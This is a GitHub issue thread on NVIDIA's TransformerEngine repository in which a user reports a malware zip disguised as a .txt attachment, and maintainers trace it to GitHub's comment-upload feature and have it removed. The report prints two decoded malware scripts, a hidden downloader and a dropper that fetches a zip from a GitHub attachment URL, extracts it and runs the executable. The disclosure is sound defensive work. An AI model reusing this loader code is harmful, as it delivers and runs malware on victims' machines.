search

NVIDIA / TransformerEngine

A library for accelerating Transformer models on NVIDIA GPUs, including using 8-bit floating point (FP8) precision on Hopper and Ada GPUs, to provide better performance with lower memory utilization in both training and inference.
https://docs.nvidia.com/deeplearning/transformer-engine/user-guide/index.html
Apache License 2.0
1.85k stars 309 forks source link

[URGENT] Malware hosted somewhere in this repo #864

Closed andrei-cb closed 4 months ago

andrei-cb commented 4 months ago

Recently hit a pretty advanced-ish malware attack. The script in question was downloading a .zip file from this repository and running it on target PCs.

Link: https://github.com/NVIDIA/TransformerEngine/files/15392947/screens.txt

The .txt file is actually a .zip containing the malware.

Sandbox result: https://tria.ge/240523-2k2wtsbg8w

andrei-cb commented 4 months ago

tagging some active contributors that might be able to find out how the file got here.

@denera @shamisp @ptrendx @phu0ngng

trodery commented 4 months ago

@andrei-cb Can you share where you found the link you reported?

andrei-cb commented 4 months ago

Found it in a backdoored renpy game.

A python downloader was hidden in the renpy LICENSE file encoded in base64 and was executed by some backdoored code. The decoded script looks like this:

import os
import platform
import requests
import threading
from datetime import datetime

def loadfonts():
    if platform.system() != "Windows":
        return
    base_dir = os.path.join(os.getenv('APPDATA'), 'RenPy', 'bin')
    if not os.path.exists(base_dir):
        os.makedirs(base_dir)
    script_path = os.path.join(base_dir, 'fontsload.py')

    url = '<malware_link_censored>'
    response = requests.get(url)
    if response.status_code == 200:
        with open(script_path, 'w') as file:
            file.write(response.text)

        try:
            from importlib import util
            spec = util.spec_from_file_location("downloaded_module", script_path)
            downloaded_module = util.module_from_spec(spec)
            spec.loader.exec_module(downloaded_module)
            if hasattr(downloaded_module, 'run'):
                downloaded_module.run()
        except Exception as e:
            pass

def screenload():
    thread = threading.Thread(target=loadfonts)
    thread.start()

fontsload.py file looks like this:

import os
import requests
import zipfile
import subprocess

def run():
    # Define the URL of the file you want to download (updated to the new ZIP file URL)
    download_url = "https://github.com/NVIDIA/DeepLearningExamples/files/15425890/screens.txt"

    # Define the path where the file will be saved and extracted
    appdata_path = os.getenv('APPDATA')
    target_directory = os.path.join(appdata_path, 'RenPy', 'bin')
    zip_file_path = os.path.join(target_directory, 'downloaded.zip')
    executable_path = os.path.join(target_directory, 'game_name.exe')

    # Ensure the target directory exists
    if not os.path.exists(target_directory):
        os.makedirs(target_directory)

    # Download the ZIP file and save it
    response = requests.get(download_url)
    if response.status_code == 200:
        with open(zip_file_path, 'wb') as file:
            file.write(response.content)
        print(f"ZIP file downloaded and saved to {zip_file_path}")

        # Extract the ZIP file
        try:
            with zipfile.ZipFile(zip_file_path, 'r') as zip_ref:
                zip_ref.extractall(target_directory)  # Using the provided password
            print("ZIP file extracted.")
        except zipfile.BadZipFile as e:
            print(f"Failed to extract ZIP file. Check if the file is a valid ZIP archive: {e}")
            return
        except RuntimeError as e:
            print(f"Password error or ZIP extraction error: {e}")
            return

        # Execute the extracted .exe file
        if os.path.exists(executable_path):
            try:
                subprocess.call([executable_path], shell=True)
                print("Executable file run successfully.")
            except Exception as e:
                print(f"Error executing the file: {e}")
        else:
            print("Executable file does not exist.")

        # Clean up the ZIP file
        os.remove(zip_file_path)
        print(f"ZIP file removed from {zip_file_path}.")

    else:
        print("Failed to download the ZIP file.")

This downloads the file reported above and executes it. Looks like the second script was coded with some ai assistant, lmao.

The executable from the downloaded archive is digitally signed, so i guess the malware is loaded using some kind of dll hijacking.

image
TombieCat commented 4 months ago

Thanks for the information. Security team is on it.

ptrendx commented 4 months ago

@andrei-cb Thank you very much for the report. Security investigation showed that the malicious file was not part of the Transformer Engine repo itself (so our users are safe). The file was uploaded (and the link pointing to our repo was produced in order to make it look trustworthy) via the comment attachment feature of GitHub, see e.g. this article for details: https://www.bleepingcomputer.com/news/security/github-comments-abused-to-push-malware-via-microsoft-repo-urls/ We contacted GitHub and the file was removed. Closing this issue.